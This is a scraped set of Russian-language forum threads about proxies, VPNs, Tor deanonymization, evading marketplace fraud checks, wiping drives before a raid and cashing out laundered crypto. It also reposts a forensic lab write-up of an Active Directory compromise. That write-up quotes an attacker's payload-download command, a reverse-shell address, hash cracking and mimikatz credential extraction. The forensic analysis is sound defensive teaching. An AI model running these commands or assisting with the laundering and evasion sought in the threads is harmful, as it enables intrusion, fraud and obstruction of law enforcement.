Author: pablo
Replies: 0 Views: 956

При запуске клиента 911 (прокси, сервис http://911.re ) вылазит такая табличка

Будьте бдительны, господа! Они нас сливают.

close

ID: 676533bbb4103b69df371bb3
Thread ID: 52641
Created: 2021-06-08T15:47:44+0000
Last Post: 2021-08-27T14:34:57+0000
Author: Jim0x
Replies: 10 Views: 954

close

Nord vpn не дает зайти в аккаунт

ID: 676533bbb4103b69df371ba3
Thread ID: 52711
Created: 2021-06-10T05:14:18+0000
Last Post: 2021-09-19T19:38:37+0000
Author: Грустная жаба
Replies: 6 Views: 953

Пишет эту херню на разных акках: Учетная запись заблокирована для вашей безопасности. Мы отправили вам электронное письмо, чтобы разблокировать его. Кроме того, сбросьте свой пароль или используйте другой способ входа в систему.
Что делать? Кто сталкивался?

Обфуцированный на сетевом уровне VPN с чистыми выходными IP

ID: 676533bbb4103b69df371942
Thread ID: 119677
Created: 2024-07-27T10:47:30+0000
Last Post: 2024-07-29T11:34:29+0000
Author: Mikeclover
Replies: 1 Views: 951

В продолжение обсуждения которое я начал четыре месяца назад (https://xss.is/threads/111437/) хотел бы представить реализованный на макете проект обфуцированного на сетевом уровне VPN с чистыми выходными IP.

Основное отличие от уже имеющихся решений состоит в том, что исправлен классический недостаток VPN, а именно соединение до выходного узла идет не напрямую через один сервер от клиента, а обфуцируется (но не сам трафик, а способ его приема- передачи). А это значит,что анонимный трафика уже в разы затруднительнее связать с реальными пользователями.

Как уже отмечалось в предшествующей теме, наблюдается аналогия с TOR. Однако , хочу отметить, что здесь не только решена проблема с уже всем известными DA которые напрямую показывают использование TOR-сети (у меня же только чистые резидентские IP), но и принцип маршрутизации отличается в корне. Для будущих пользователей из стран с жесткой цензурой, хочу сказать, что блокировок такой VPN не боится.

Если коротко, то развернута сеть из серверов, которые связаны с резидентскими IP страны, которая обговаривается индивидуально. А трафик пользователя такого VPN невозможно связать с выходным трафиком, так как по пути он проходит через несколько дополнительных разных узлов.

Естественно. что за все надо платить. Поэтому имеется всего один недостаток - скорость работы (она порядка 2 Мбит/сек). Но , стоит отметить, что использование представленного VPN носит узкоспециализированный характер для профессионалов: работать на нашем любимом форуме с телефона (предусматривается специальный браузер для андроид - в процессе разработки) или работать в платежных системах или биржах (десктопное приложение - аналогично на стадии создания). Именно для таких целей и разрабатывалась концепция.

Все делаю исключительно сам и пока один, именно поэтому все идет достаточно медленно.

что лучше vpn / socks?

ID: 676533bbb4103b69df371c51
Thread ID: 46966
Created: 2021-01-19T08:11:20+0000
Last Post: 2021-01-28T09:52:37+0000
Author: manna9s
Replies: 8 Views: 951

Напишите, минусы vpn / socks5.

Напишите, плюсы vpn / socks5.

Что по вашему лучше vpn / socks5?

Нужна объективная критика.

Исследуем дампы и ищем следы взлома в системе

ID: 676533bbb4103b69df371a9c
Thread ID: 75196
Created: 2022-11-03T21:41:26+0000
Last Post: 2022-11-03T21:41:26+0000
Author: baykal
Prefix: Статья
Replies: 0 Views: 950

Сегодня я расскажу, как извлекать данные из таблицы MFT, получать информацию из файлов Prefetch и монитора использования системных ресурсов (srum), а еще — анализировать файлы логов операционной системы. При исследовании образа оперативной памяти мы познакомимся с внутренним устройством памяти Windows и найдем артефакты, свидетельствующие о компрометации системы.

Расследование киберинцидентов — это очень увлекательное занятие, требующее определенных знаний и навыков. Отточить их помогают специальные лабораторные работы, имитирующие реальные случаи успешных атак злоумышленников и взлома, с которыми встречаются на практике специалисты по информационной безопасности. Сегодня мы разберем лабораторную работу Pwned- DC с ресурса CyberDefenders.

По сценарию лабораторной работы произошел взлом Active Directory, злоумышленники смогли захватить корпоративный контроллер домена. Наша задача — провести расследование инцидента и узнать, как хакерам удалось проникнуть в сеть. Для исследования у нас имеется побитовая копия системного диска скомпрометированной машины, оперативной памяти, а также информация об объектах домена.

Загрузим файл [образов](https://cyberdefenders.org/blueteam-ctf- challenges/enroll/89) и начнем их исследовать.

По результатам разбора этой лабораторной необходимо ответить на ряд вопросов, но я покажу только само решение и не буду озвучивать ответы. Тебе придется повторить весь процесс самостоятельно — так ты лучше поймешь и закрепишь материал.

ИНСТРУМЕНТЫ

Утилиты Eric Zimmerman: Registry Explorer, MFTECmd.

Утилиты Nirsoft: fulleventlogview, winprefetchview, browsinghistoryview, TurnOnTimesView.

R-Studio — утилита для восстановления данных с диска.

Volatility Framework 2.6.1 — инструмент, реализованный на Python версии 2 и предназначенный для извлечения артефактов из образцов энергозависимой памяти.

PST-Extractor — инструмент для восстановления PST-контейнеров в EML.

Scdbg — программа для анализа shell-кода.

Srum-dump — утилита для извлечения информации из базы данных управления использованием системных ресурсов.

FTK Imager — инструмент для анализа и получения образов диска.

WinDBGx64 — утилиты для анализа аварийных дампов.

Olevba — инструмент для извлечения и анализа исходного кода макросов VBA из документов MS Office (OLE и OpenXML).

ПЛАГИНЫ VOLATILITY2 ДЛЯ ИЗВЛЕЧЕНИЯ ДАННЫХ

Imageinfo — плагин для определения операционной системы, пакета обновлений и аппаратной архитектуры исследуемого образа.

Pstree позволяет просматривать список процессов в виде дерева.

Memdump извлекает все резидентные страницы памяти в процессе.

Filescan — плагин для поиска объектов FILE_OBJECT в памяти с помощью сканирования тегов пула. Этот плагин найдет все открытые файлы.

Dumpfiles извлекает кешированные файлы из образа памяти.

Netscan ищет сетевые артефакты в 32- и 64-разрядных дампах памяти. Этот плагин находит конечные точки TCP, UDP, а также локальные и удаленные IP-адреса.

Printkey ищет значения в указанном разделе реестра Windows.

Userassist позволяет получить информацию из ключа реестра UserAssist.

Mftparser — этот плагин сканирует записи главной таблицы файлов (MFT) в памяти и выводит информацию о временных метках файлов.

Autoruns — подключаемый плагин для поиска точек сохранения исполняемых файлов в системе. Для его подключения необходимо добавить плагин в каталог plugins инструмента Volatility.

Volshell — плагин для интерактивного изучения образа памяти, использует IPython.

Procdump — плагин для получения дампа исполняемого файла.

Hivelist — плагин для поиска виртуальных адресов кустов реестра.

ОБЪЕКТЫ ДОМЕНА

В архиве задания содержится файл 20211122102526.zip, который хранит информацию об объектах домена. Загрузим его в BloodHound версии 4.0.1.

Перейдем на вкладку Analysyis → Find Shotest Paths to Domain Admins и проанализируем короткий путь до компрометации контроллера домена.

Задача злоумышленника в сети организации — получить доступ к учетной записи пользователя 0xMohammed, который входит в группу Domain Admins.

ОБРАЗ ДИСКА AD.E01

Примонтируем файл побитовой копии диска AD.E01 и извлечем из него необходимые артефакты. Для этого откроем утилиту FTK Imager, перейдем на вкладку File → Image Mounting. В поле Image File выберем образ AD.E01, а затем введем указанные ниже настройки.

Нажимаем Mount — исследуемый образ должен примонтироваться к файловой системе.

Получим информацию из кустов реестра SYSTEM и SOFTWARE (C:\Windows\System32\config), загрузим их в утилиту Registry Explorer. Затем переходим в раздел File -> Load hive и выбираем исследуемый файл.

Чтобы получить информацию об операционной системе, перейдем в ключ реестра SOFTWARE\Microsoft\Windows NT\CurrentVersion.

Версия операционной системы — Windows 10 Enterprise 2016 LTSB. Теперь просмотрим ключ реестра SYSTEM\ControlSet01\Control\ComputerName\ComputerName и получим информацию об имени компьютера.

Имя компьютера: PC01.

Теперь откроем ключ реестра SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{ea202436-8a31-4cb6-9b59-5be0c2bc1692} и получим информацию о сетевых настройках.

IP-адрес исследуемого хоста — 192.168.112.142.

Получим информацию о примонтированных дисках. Для этого перейдем в ветку реестра SYSTEM\MountedDevices: нас интересует GUID диска C.

Как видно из рисунка выше, GUID диска C — fad905b3-fb35-4dbd- ab31-a44f022809d2, такую же информацию можно получить из логов системы, просмотрев событие eventid 142 журнала Microsoft-Windows-Ntfs/Operational.

Теперь найдем порты служб на PC01, для этого перейдем к файлу Windows/System32/drivers/etc/services.

Здесь мы можем увидеть, что служба Remote Man Server работает на порте 9535. Проанализируем файл System.evtx и найдем отметку времени, когда произошло незапланированное отключение, а также узнаем, сколько времени проработал компьютер. Для этого можно воспользоваться утилитой TurnOnTimesView, либо придется анализировать лог вручную.

21.11.2021 питание машины незапланированно отключилось, до этого компьютер проработал 11 часов и 31 минуту (об этом говорит значение 11:31).

Начнем анализировать логи. Для этого откроем утилиту fulleventlogview, нажмем Choose Data Store → Load events from external folder with log files и укажем путь к папке с логами Windows\System32\winevt\Logs.

Отфильтруем логи по событию 4624 и посмотрим, кто авторизовывался в системе последний раз перед инцидентом. Для этого переходим на вкладку Options → Advanced Options, выбираем Show only the specified events IDs и вводим наше событие.

23.11.2021 в 23:36:05 UTC пользователь 0xMohammed авторизовался в системе — это был последний зарегистрированный логин перед взломом.

Проанализируем историю браузера Firefox пользователя labib. Для этого воспользуемся утилитой BrowsingHistoryView: перейдем на вкладку Options → Advanced Options и укажем путь до пользовательского каталога.

Пользователь labib 22.11.2021 в 19:45:52 UTC посетил сайт bluedemy.cyberdefenders.org.

Проанализируем базу данных управления использованием системных ресурсов (srum), которая присутствует в современных системах Windows и собирает статистику выполнения двоичных файлов. Эта база хранится в файле C:\Windows\System32\sru\\RUDB.dat. С использованием утилиты srum-dump проанализируем srum и найдем, сколько байтов было принято браузером Firefox.

Не забываем также указать файл SRUM_TEMPLATE.xlsx, который загружаем из репозитория утилиты.

Открываем выходной файл SRUM_DUMP_OUTPUT.xlsx, переходим на лист Network Data Usage, находим firefox.exe и анализируем таблицу. Количество полученных данных — 20418287.

Теперь посмотрим, какие последние файлы запускал пользователь labib. Переходим по пути С/Users/labib/AppData/Roaming/Microsoft/Windows/Recent/ и в этом каталоге находим файл 20211119103954_BloodHound.lnk, созданный 19.11.2021.

В ссылке на файл указан путь к архиву C:\Users\labib\Desktop\20211119103954_BloodHound.zip., содержащий информацию об объектах домена. Эта информация собиралась для анализа в BloodHound.

Проанализируем MFT с помощью утилиты MFTECmd. Из корня файловой системы извлечем файл $MFT, это можно сделать с помощью R-Studio или FTKImager.

В каталоге Users/labib/Desktop создан файл Business.xlsx с меткой времени 22.11.2021 22:40:06, этот файл содержит информацию о пользователях домена и их деятельности в компании. Найдем указанный файл в таблице MFT:

Code:Copy to clipboard

MFTECmd.exe -f "C:\Users\DonNod\Downloads\AD-101\AD-E01\MFT" --csv "AD-101\AD-E01"

В файле вывода утилиты MFTECmd обнаруживаем Business.xlsx и его поле LogfileSequenceNumber, которое имеет значение 1422361276.

Попробуем получить пароль пользователя 0xMohammed, который входит в группу администраторов домена. Выгрузим ветки реестра SAM, SYSTEM, SECURITY и вытащим из них хеши пользователей. Для этого воспользуемся скриптом secretdum.py из пакета Impacket.

На хосте PC01 авторизовывался доменный пользователь 0xMohammed, его данные сохранены в кеше. С помощью утилиты hashcat сбрутим mccache2 хеша пользователя 0xMohammed:

Code:Copy to clipboard

$DCC2$10240#0xMohammed#e7b8d19008520207ca8ef94680db0f28

В результате этой операции выясняется, что его пароль — 0xmohammed!.

Теперь попытаемся узнать, как злоумышленник скомпрометировал хост PC01. Анализируя файлы, в каталоге C:\Users\labib\Documents\Outlook Files\Outlook.pst пользователя labib мы обнаруживаем почтовый контейнер Outlook. Преобразуем контейнер в eml-сообщения, для этого откроем утилиту PST- Xtracrot, загрузим в нее контейнер и нажмем Convert. После этого можно проанализировать все сообщения антивирусными средствами, чтобы поискать вредоносные вложения.

Среди сообщений пользователя мы обнаруживаем вредоносное вложение. Сообщение отправлено 12/08/2021 04:47:49 AM UTC с почтового сервера 159.65.58.195. В качестве вложения используется файл Unpaid Invoice.xls. Выясним, когда пользователь открыл этот файл.

С помощью утилиты winprefetchview исследуем артефакт Prefetch. Для этого нажмем Options → Advanced Options и выберем расположение файлов prefetch скомпрометированного компьютера: WindowsPrefetch. Файлы Prefetch содержат имя исполняемого файла, количество его запусков, метки времени, а также список файлов и каталогов, с которыми взаимодействовал исполняемый файл.

Поле Last Run содержит дату последних семи запусков. Как видно из рисунка выше, пользователь открыл файл Unpaid Invoice.xls, при этом последняя метка времени запуска приложения Excel.exe — 22.11.2021 в 19:38:16 UTC. Осталось выяснить, что представляет собой вредоносный файл Unpaid Invoice.xls, по его MD5: 650cf937046ce0c755a217ae8a60611d.

Файл содержит VBA-скрипт. Вытащим его с помощью olevba. При запуске появляются ошибки, поэтому мы запустим утилиту с параметром --show-pcode. Техника встраивания вредоносного кода в содержащий макрос документ называется [Stomping VBA](https://dmcxblue.gitbook.io/red-team-notes-2-0/red-team- techniques/defense-evasion/t1564-hide-artifacts/vba-stomping).

Code:Copy to clipboard

olevba --show-pcode Unpaid\ Invoice.xls

Извлечем p-code, найдем шелл и проанализируем его.

Преобразуем его в следующий формат и сохраним в файл sc.

Проанализируем полученный файл с помощью утилиты scdbg.

Code:Copy to clipboard

scdbg /f sc

После запуска документа Unpaid Invoice.xls устанавливается обратная оболочка с управляющим сервером 192.168.112.128:8080, после чего злоумышленник может выполнять команды на скомпрометированном компьютере.

Приступим к анализу логов операционной системы и выясним, какие еще действия совершил злоумышленник в системе. Откроем утилиту fulleventlogview, перейдем на вкладку File → Choose Data Source и укажем путь к файлам логов: Windows\System32\winevt\Logs.

Проанализируем сначала логи антивируса Windows Defender. Мы сразу же обнаруживаем событие c идентификатором 1116 (MALWAREPROTECTION_STATE_MALWARE_DETECTED), которое свидетельствует об обнаружении вредоносного файла.

Пользователь 0xMohammed пытался открыть файл по пути \\vmware-host\Shared Folders\asd\note.txt в блокноте. Windows Defender обнаружил вредоносный файл и классифицировал его как Exploit:Win32/ShellCode.BN (каталог расположения файла asd).

Предположительно запуск вредоносного документа Unpaid Invoice.xls произошел 22.11.2021 19:38 UTC, с этого момента мы и начнем анализировать логи. В 20:26:03 UTC была запущена оболочка Windows PowerShell (события имеют идентификаторы 400 и 600), далее начинается выполнение команды.

После выполнения обратной оболочки в файле Unpaid Invoice.xls злоумышленник получил доступ к компьютеру, затем он начал выполнять команды PowerShell, показанные на рисунке выше. Извлечем их из логов и преобразуем в текстовый вид.

Злоумышленник запустил новую оболочку PowerShell от имени пользователя labib для устойчивого доступа к скомпрометированному компьютеру с IP-адресом 192.168.112.128, на порте 1337. Далее взломщик пытался авторизоваться на хосте DC01 c учетными данными пользователя labib. В 21:20:29 зафиксировано событие 4648 — авторизация на компьютере DC01 от пользователя labib, имя процесса PowerShell.exe.

В 21:20:46 также зафиксированы попытки входа на PC01 с адреса 192.168.112.128, авторизоваться пытался тот же пользователь labib.

В 21:51:15 UTC от имени пользователя labib выполнен скрипт Invoke- ACLPwn.ps1. Этот скрипт предназначен для удаления списков ACL в Active Directory, настроенных небезопасно, а также для сбора данных об объектах домена.

Для получения доступа к компьютеру DC01 злоумышленнику необходимо завладеть учетной записью пользователя 0xMohammed, который входит в группу Domain Admins. В 22:56:23 UTC обнаружено подключение к DC01 c помощью службы WinRM, идентификатор события 6.

В 22:58:44 UTC зафиксировано событие авторизации на хосте DC01, при этом были введены учетные данные пользователя 0xMohammed.

С этого момента злоумышленник выполнял команды PowerShell уже от имени пользователя 0xMohammed. В 23.11.2021 13:32:44 UTC доменный пользователь CYBERDEFENDERS\0xMohammed зарегистрировал задачу MicrosoftEdge, идентификатор события 106. Найдем эту задачу в каталоге Windows\System32\Tasks\MicrosoftEdge.

Согласно матрице MITRE ATT&CK, такая техника атаки называется T1053.005 , атакующий использовал управляющий сервер c2.cyberdefenders.org.

Теперь проверим историю команд PowerShell. Для пользователя administrator в файле C:/Users/administrator/AppData/Roaming/Microsoft/Windows/PowerShell/PSReadline/ConsoleHost_history.txt хранится следующая информация.

При исследовании артефактов, извлеченных из побитовой копии образа хоста PC01, удалось восстановить ход взлома. С помощью фишингового письма, содержащего шелл‑код с адресом управляющего сервера 192.168.112.128:8080, злоумышленники получили доступ к компьютеру от имени пользователя labib. Затем они собрали информацию о домене и скомпрометировали учетные данные администратора домена 0xMohammed. Для доступа к хосту DC01 атакующие использовали службу WinRM и удаленное выполнение команд PowerShell.

ОБРАЗ ОПЕРАТИВНОЙ ПАМЯТИ ХОСТА DC01

При исследовании образа оперативной памяти мы научимся выявлять артефакты удаленного выполнения кода службы WinRM, познакомимся с важными структурами исполняемых объектов памяти Windows, узнаем, как их анализировать, и выясним, что сделал злоумышленник на скомпрометированном компьютере.

Для начала получим информацию об исследуемом профиле и имени компьютера.

Code:Copy to clipboard

python2.7 vol.py -f memory.dmp imageinfo

Профиль образа — Win2016x64_14393. Теперь получим информацию из ключа реестра SYSTEM\ControlSet001\Control\ComputerName\ComputerName.

Code:Copy to clipboard

python2.7 vol.py -f memory.dmp --profile=Win2016x64_14393 printkey -K “SYSTEM\ControlSet001\Control\ComputerName\ComputerName”

Получим адрес ветки реестра SOFTWARE:

Code:Copy to clipboard

python2.7 vol.py -f memory.dmp --profile=Win2016x64_14393 hivelist

Адрес ветки SOFTWARE — 0x00000000040f7000.

Можно приступать к анализу процессов. Для этого воспользуемся плагином pstree, а результат выполнения сохраним в файл.

Code:Copy to clipboard

python2.7 vol.py -f memory.dmp --profile=Win2016x64_14393 pstree > pstree.txt

Из рисунка выше видно, что процесс svchost.exe (идентификатор 512) породил экземпляр процесса wsmprovhost.exe (идентификатор 1632), который является хост‑процессом для подключаемых модулей службы WinRM. Команды PowerShell злоумышленника удаленно выполнялись в контексте процесса wsmprovhost.exe (идентификатор 1632). Также процесс 1632 создал дочерний процесс svchost.exe. Из полученного анализа можно сделать вывод, что злоумышленники получили доступ к компьютеру DC01, используя возможности службы WinRM.

Качественный анализ поиска удаленного выполнения команд PowerShell описан в статье [Investigating PowerShell Attacks](https://www.blackhat.com/docs/us-14/materials/us-14-Kazanciyan- Investigating-Powershell-Attacks-WP.pdf).

Службы WinRM для взаимодействия используют протокол [WS- Management](https://learn.microsoft.com/ru-ru/windows/win32/winrm/ws- management-protocol), который отправляет сообщения SOAP в потоке XML- сообщений. Их структура представлена в документации. Получим все резидентные страницы памяти процесса wsmprovhost.exe (идентификатор 1632) и извлечем из него все XML-объекты, в которых передаются команды PowerShell службы WinRM.

Code:Copy to clipboard

python2.7 vol.py -f memory.dmp --profile=Win2016x64_14393 memdump -p 1632 -D .

Все найденные XML-объекты сохраним в файл. Затем в структуре XML-документа найдем поле <S N="History">:

Code:Copy to clipboard

strings 1632.dmp | grep -i '<Obj RefId="0">' > objectPS

Для загрузки файла svchost.exe используется следующая команда PowerShell: Invoke-WebRequest http://192.168.112.128:8000/svchost.exe -OutFile svchost.exe. Спускаемся ниже и видим запуск данного файла.

Иногда сложно найти вредоносный процесс в памяти Windows, в этом случае можно получить дампы всех процессов в системе и проверить их с помощью антивируса.

Code:Copy to clipboard

python2.7 vol.py -f memory.dmp --profile=Win2016x64_14393 procdump -D procdmp/

Процесс svchost.exe, идентификатор `3140, вредоносный и относится к семейству шифровальщиков DarkSide. Получим информацию о привилегиях этого процесса в системе, для чего воспользуемся плагином privs.

Code:Copy to clipboard

python2.7 vol.py -f memory.dmp --profile=Win2016x64_14393 privs -p 3140

Количество привилегий по умолчанию у этого вредоносного процесса — 25. Давай проведем глубокий анализ вредоносного процесса 3140, но прежде немного поговорим о структурах исполняемых объектов в памяти.

Найдем поле PoolTag структуры _POOL_HEADER исследуемого процесса. В памяти Windows есть следующие криминалистически важные исполняемые объекты: _FILE_OBJECT — экземпляр открытого файла, представляющий доступ процесса или модуля ядра к файлу, _EPROCESS — структура процесса в памяти, _TOKEN, _ETHREAD и многое другое.

Описание структуры памяти Windows представлено в книге [The Art of Memory Forensics: Detecting Malware and Threats in Windows, Linux, and Mac Memory](https://repo.zenk- security.com/Forensic/The%20Art%20of%20Memory%20Forensics%20-%20Detecting%20Malware%20and%20Threats%20in%20Windows,%20Linux,%20and%20Mac%20Memory%20(2014).pdf).

Каждый исполняемый объект Windows хранится в следующей структуре.

Пул ядра — это диапазон памяти, который можно разделить на мелкие блоки для хранения данных любого типа.

Структура _POOL_HEADER содержит элемент PoolTag — состоящеиз ASCII-символов четырехбайтовое значение. Этот элемент создан Microsoft для отладки и аудита ядра. Элемент PoolTag может иметь значения Proc, Thrd, File и другие. Многие плагины Volatility для поиска объектов в памяти используют метод сканирования PoolTag, чтобы находить скрытые и завершенные процессы, а также руткиты. Размер структуры _POLL_HEADER составляет 10 байт.

Структура _OBJECT_HEADER общая для всех типов исполняемых объектов. Размер Optional Header в структуре пула исполняемого объекта определяется в зависимости от содержимого поля InfoMask.

Наша задача — найти содержимое элемента PoolTag в структуре _POOL_HEADER вредоносного процесса svchost.exe (идентификатор 3140). Для этого необходимо перейти к адресу структуры _EPROCESS, далее в структуре _OBJECT_HEADER найти элемент InfoMask, чтобы определить размер Optional Header, и перейти на адрес структуры _POOL_HEADER. Для этого воспользуемся плагином volshell.

Code:Copy to clipboard

python2.7 vol.py -f memory.dmp --profile=Win2016x64_14393 volshell -p 3140

Далее получим адрес структуры _EPROCESS.

Code:Copy to clipboard

proc()

Адрес исследуемого процесса — 0xFFFFBA03419B7800.

Теперь получим содержимое структуры _OBJECT_HEADER. Для этого из адреса 0xFFFFBA03419B7800 вычтем 0x30 (размер _OBJECT_HEADER).

Code:Copy to clipboard

dt("_OBJECT_HEADER",0xFFFFBA03419B7800-0x30)

Значение поля InfoMask — 0x8, а значит, по таблице выше размер Optional Header составляет 0x20 байт.

Чтобы перейти на адрес структуры _POOL_HEADER вредоносного процесса svchost.exe, необходимо из адреса 0xFFFFBA03419B7800 вычесть 0x30 (размер _OBJECT_HEADER), 0x20 (размер Optional Header) и 0x10 (размер _POOL_HEADER).

Code:Copy to clipboard

dt("_POOL_HEADER",0xFFFFBA03419B7800-0x30-0x10-0x20)

Переводим значение PoolTag в шестнадцатеричное представление в обратном порядке представления байтов и получаем значение в кодировке ASCII MHML (0x4d 0x48 0x4d 0x4c).

Продолжим анализировать этот процесс с помощью плагина volshell и найдем содержимое кучи, в которой хранятся обрабатываемые процессом динамические данные. Каждая структура _EPROCESS содержит элемент Process Environment Block (PEB). PEB хранит полный путь к исполняемому файлу процесса, командную строку, которая запускает процесс, текущий рабочий каталог, а также указатели на кучи процесса.

Структура PEB присутствует в каждом процессе, который содержит в себе кучу. Наша задача — найти адреса данных, хранящихся в куче. Это и будет спрятанное 8-байтовое слово в памяти процесса. Нужно найти строки, содержащиеся в куче процесса: для этого нам необходимо получить адреса куч и вывести их содержимое. Можно воспользоваться плагином heaps, но он довольно прост в работе, поэтому попробуем восстановить нужные значения вручную.

Code:Copy to clipboard

python2.7 vol.py -fmemory.dmp --profile=Win2016x64_14393 volshell -p 3140

Получим из кучи процесса указатели на их содержимое. Вводим в строке vollshell следующее:

Code:Copy to clipboard

address_of_heaps = proc().Peb.ProcessHeaps.dereference()

Мы получили указатели, теперь циклом выведем их содержимое.

Мы обнаружили все данные, содержащиеся в куче. Скрытое 8-байтовое слово — c0n6r475.

Используя плагин yarascan, найдем все ссылки в памяти процесса. Для этого воспользуемся следующим регулярным выражением: /(https?:\/\/)?([\w\.-]+)([\/\w \.-]*)/.

Code:Copy to clipboard

python2.7 vol.py -f memory.dmp --profile=Win2016x64_14393 yarascan -Y "/(https?:\/\/)?([\w\.-]+)([\/\w \.-]*)/" -p 3140

Анализируя ссылки процесса, мы обнаружили интересную строку с каким‑то ключом. Попробуем определить его содержимое. Для этого получим дамп всего адресного пространства процесса 3140:

Code:Copy to clipboard

python2.7 vol.py -f memory.dmp --profile=Win2016x64_14393 memdump -p 3140 -D

И найдем значения key:

Code:Copy to clipboard

strings 3140.dmp | grep 'lsJTyy' -B 50 -A 10

Мы обнаружили требование о выкупе, которое оставил шифровальщик DarkSide. Найдем в образе памяти адрес смещения 567-байтового значения ключа Key:, для этого воспользуемся плагином yarascan:

Code:Copy to clipboard

python2.7 vol.py -f memory.dmp --profile=Win2016x64_14393 yarascan -Y "lsJTyy" -p 3140

Шифровальщик сохранил 567-байтовый ключ в памяти по смещению 0x00b5f4a5. Получим список файлов в памяти и найдем файл svchost.exe.

Code:Copy to clipboard

python2.7 vol.py -f memory.dmp --profile=Win2016x64_14393 filescan > filescan.txt

Преобразуем адрес в физическое смещение, для этого воспользуемся плагином volshell.

Code:Copy to clipboard

hex(addrspace().vtop(0x0000ba033f477bc0))

По физическому адресу 0x13c090bc0 в памяти хранится файл svchost.exe. Просмотрим содержимое структуры _FILE_OBJECT файла svchost.exe, виртуальный адрес которого — 0x0000ba033f477bc0. Для этого воспользуемся плагином volshell.

Code:Copy to clipboard

python2.7 vol.py -f memory.dmp --profile=Win2016x64_14393 volshell dt("_FILE_OBJECT",0x0000ba033f477bc0)

Преобразуем значение в элементе DeviceObject в шестнадцатеричное представление.

Code:Copy to clipboard

hex(18446667121827189856)

Адрес устройства, на котором сохранен шифровальщик svchost.exe, — 0xffffba033e631460.
Выгрузим исследуемый файл из файловой системы, в качестве адреса укажем адрес смещения.

Code:Copy to clipboard

python2.7 vol.py -f memory.dmp --profile=Win2016x64_14393 dumpfiles -Q 0x13c090bc0 -D .

Загрузим любой из полученных файлов в утилиту PeStudio.

Внутреннее имя исполняемого файла svchost.exe — calimalimodumator.exe. Посмотрим таблицу импорта и найдем интересные функции WinAPI.

В таблице импорта находится WinAPI-функция GetLocaleInfoA: она используется для получения локали операционной системы. Проанализируем процесс lsass.exe и найдем мастер‑ключ.

Процесс Local Security Authority Subsystem Service (он же LSASS) предназначен для управления подсистемами аутентификации Windows. Для хранения аутентификационных данных в памяти используется механизм DPAPI (Windows Data Protection API), который шифрует пароли и любую другую важную информацию пользователя. Для расшифровки данных, зашифрованных через DPAPI, необходим мастер‑ключ, хеш и SID пользователя. Попробуем распарсить процесс lsass.exe и найдем мастер‑ключ пользователя 0xMohammed.

Используя плагин lsadump volatility, мне не удалось вытащить данную информацию. Воспользуемся утилитой Windbgx64. Загрузим файл memdump.dmp в Windbgx64, для этого перейдем на вкладку File → Open CrashDump. Все остальные действия будем производить в командной строке отладчика.

Code:Copy to clipboard

!analyze -v

Теперь загрузим mimikatz в WinDbg.

Code:Copy to clipboard

.load mimikatz-master\x64\mimilib.dll

Найдем адрес структуры _EPROCESS процесса lsass.exe.

Code:Copy to clipboard

!process 0 0 lsass.exe

Переходим по адресу ffffba033ef746c0.

Code:Copy to clipboard

.process /r /p ffffba033ef746c0

Парсим lsass.exe.

Code:Copy to clipboard

!mimikatz

Находим пользователя 0xMohammed и видим следующую информацию.

Мастер‑ключ пользователя 0xMohammed — 1652c67aa6719519492e67d1b39cab91e7804eb26b259ff351b60df34ee808804314cbfbcf03afbf3bae3ef2790f2c363ca0a9c8791e0e80d490c26afe77c3be.

ВЫВОДЫ

Мы исследовали образ оперативной памяти, познакомились со структурами _EPROCESS и _FILE_OBJECT, разобрались, как происходит сканирование пула тегов и какие данные там хранятся. Обнаружили, что злоумышленник получил доступ к компьютеру DC01 с помощью службы WinRM, а также вытащили переданные им команды PowerShell.

Автор @rayhunt454
xakep.ru

Parallels tools - это закладка?

ID: 676533bbb4103b69df371bde
Thread ID: 53159
Created: 2021-06-21T09:24:41+0000
Last Post: 2021-06-21T13:04:25+0000
Author: Pirone
Replies: 3 Views: 943

При установки Parallels - всегда предлагает установить parallels tools, в теори это может быть закладка?

Как меня палят площадки?

ID: 676533bbb4103b69df3719ce
Thread ID: 103892
Created: 2023-12-11T15:32:39+0000
Last Post: 2024-01-04T13:19:48+0000
Author: Dorask09
Replies: 10 Views: 941

Всем доброго времени суток.
У меня проблема связанная с торговыми площадками.
Аккаунт живет час - два и сразу его лочит.
Использую резидентные прокси + антики (Octo Browser).
В чем может быть причина?
Я уже дмал что площадки как - то палят что я именно использую прокси и по факту сразу же за это и блочат. ТП отвечает что вы мол используете ВПН.
Так вот как они понимают что я юзаю прокси?

уничтожение данных на ssd

ID: 676533bbb4103b69df371a1e
Thread ID: 96394
Created: 2023-08-23T16:56:03+0000
Last Post: 2023-08-27T06:51:28+0000
Author: coder
Replies: 18 Views: 940

Вы не успеете ничего удалить, если вас будут крепить. И никто не будет долго ждать, пока дверь откроется. При приёме в первую очередь отключат свет на щитке, затем культурно попросят открыть дверь. Не откроете в течении нескольких минут - дверь вынесут. Если обнаружат, что данные уничтожались - экспертиза это подтвердит и это будет отягчающми обстоятельством

VPN over HTTPS / Как маскировать ВПН траф?

ID: 676533bbb4103b69df371993
Thread ID: 68089
Created: 2022-06-03T14:55:21+0000
Last Post: 2024-03-18T20:26:46+0000
Author: HAT3
Replies: 17 Views: 939

В свете последних событий ищу полную версию статьи https://xakep.ru/2022/06/02/xray-vps/

Либо другие варианты, как грамотно маскировать/обернуть ВПН траф (L2TP, IKEv2, IPsec, и пр.) под https?

Знаю такие проблемы есть в Китае и Иране.

Деанонимизация сайтов в сети TOR

ID: 676533bbb4103b69df371a3e
Thread ID: 91001
Created: 2023-06-20T20:44:03+0000
Last Post: 2023-07-12T08:39:52+0000
Author: b0tk1ng
Prefix: Мануал/Книга
Replies: 12 Views: 931

Все известные способы деанонимизации скрытых сервисов в сети Тор

VT:

[ VirusTotal

](https://www.virustotal.com/gui/file/f6b37bb957e5584f9b0245ea4617d53eccdd4f2d31b902e64da7e78daa6d3e78)

VirusTotal

www.virustotal.com

Click to expand...

AnonFiles:

[ Deanonymization of TOR HTTP hidden services.pdf - AnonFiles

](https://anonfiles.com/f486Jbxfz9/Deanonymization_of_TOR_HTTP_hidden_services_pdf)

anonfiles.com

Click to expand...

Анонимное и безопасное получение налички

ID: 676533bbb4103b69df371ac5
Thread ID: 72416
Created: 2022-08-29T23:57:51+0000
Last Post: 2022-08-30T23:10:38+0000
Author: sacrifice
Replies: 6 Views: 931

Собственно всем привет.

Хотелось бы с вами подискутировать на такую тему.

Задача: Есть серая (но уже отмытая) криптовалюта - USDT/BTC/Monero, нужно превратить её в наличные средства, особо не привлекая внимания к своей персоне. Суммы небольшие, предположим до миллиона рублей.

Какие способы посоветуете?

